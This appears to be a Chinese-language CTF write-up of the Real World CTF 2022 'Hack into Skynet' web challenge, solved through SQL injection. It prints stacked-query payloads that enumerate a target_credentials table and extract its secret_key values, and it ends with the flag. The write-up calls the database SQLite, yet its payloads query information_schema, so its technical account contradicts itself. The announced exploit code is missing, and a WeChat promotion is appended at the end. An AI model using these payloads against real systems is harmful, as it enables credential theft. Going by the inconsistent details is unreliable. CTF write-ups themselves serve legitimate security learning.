攻破天网系统——Real World CTF (2022) 解题实录

<在线夺旗赛>

各位黑客朋友们好ッ✋✋，

这份技术报告将分享我在 Real World CTF 2022 中破解 Web 挑战的一种可行方案。所有挑战都基于真实世界应用构建，由于疫情影响，第四届 Real World CTF 采用线上模式。从挑战描述中，我判断存在 SQL 注入漏洞。经过约 24 小时尝试却以失败告终！

在此衷心感谢 Fanky 和 xl00t。比赛期间这个挑战让我备受煎熬，但在与两位交流后，我以全新视角重新尝试并最终攻克。因此决定为这个特殊挑战撰写技术报告。现在让我们开始：

挑战名称：入侵天网系统

挑战类型：Web

难度等级：薛定谔级（如同既死又活的假想猫，这个挑战可能"简单到发狂"）

存在两种预期解决方案：

1. 通过逻辑漏洞绕过登录并实施 SQL 注入（需绕过 WAF）

2. 滥用 Flask 框架特性

点击查看第二种方案："滥用Flask框架"

SQL 注入攻击

数据库识别

通过代码分析确认后端使用 SQLite 数据库，存在target_credentials表。

注入验证

有效 payload 示例：

'; select * from target_credentials limit 1 offset '1

通过修改 offset 值遍历 12 条记录。

数据库结构探测

'; select column_name, null from information_schema.columns    where table_name='target_credentials' limit 1 offset '1

确认表结构：

1. account

2. password

3. access_key

4. secret_key

最终攻击

获取敏感数据的终极 payload：

'; select secret_key, null from target_credentials limit 4 offset '0

成功提取全部关键字段！

最终 flag：

rwctf{t0-h4ck-$kynet-0r-f1ask_that-Is-th3-questi0n}

自动化实现

可使用以下 exploit 代码自动化攻击流程：（代码作者：xl00t）

希望这份技术报告对您有所启发。欢迎通过 @7h3h4ckv157 与我交流安全技术。下次见！🔈

附：Infosec Writeups 首届虚拟会议 IWCon2022 正在招募，汇聚 16 位顶尖安全专家，详情见iwcon.live更多精彩内容 请关注我的个人公众号 公众号（办公 AI 智能小助手）公众号二维码

办公AI智能小助手